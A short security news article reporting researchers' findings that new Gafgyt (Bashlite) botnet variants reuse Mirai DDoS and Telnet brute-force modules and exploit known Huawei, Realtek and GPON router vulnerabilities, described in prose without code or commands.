A few new variants of the Gafgyt Linux-based botnet now demonstrate features of the infamous Mirai botnet, research by Uptycs has discovered. The IoT-targeting botnet now features new exploits for the initial compromise of Huawei, Realtek, and Dasan GPON routers.
Gafgyt also known as Bashlite, first uncovered in 2014, targets vulnerable internet of things (IoT) devices by well-known manufacturers, such as Huawei, Realtek, and ASUS. Upon successful penetration, the botnet launches large-scale distributed denial-of-service (DDoS) attacks. And by targeting well-known vulnerabilities CVE-2017-17215 (the Huawei exploit) and CVE-2018-10561 (the Realtek exploit) it can drop next-stage payloads on compromised devices.
In research from Uptycs released Thursday, researchers describe the latest variants of Gafgyt that incorporated several Mirai-based modules and also use new exploits.
The capabilities inherited from Mirai include various ways for carrying out DDoS attacks, among them HTTP flooding, UDP flooding, various TCP flood attacks, and an STD module.
In addition, Gafgyt employs new approaches for the initial compromise of IoT devices for later turning them into bots and performing DDoS attacks on specifically targeted IP addresses. These include a Mirai-inherited module for brute-forcing Telnet devices and exploits for vulnerabilities in Huawei, Realtek, and GPON devices.
To perform a range of hacking activities, attackers deliver additional payloads from their cloud storages by targeting the Huawei and Realtek exploits:
“The IP addresses used for fetching the payloads were generally the open directories where malicious payloads for different architectures were hosted by the attacker,” researchers added.
In the previous modification in early March, researchers detected the Gafgyt botnet family using the Tor network to hide its activity.
“Malware authors may not always innovate, and researchers often discover that malware authors copy and re-use leaked malware source code,” Uptycs researchers concluded.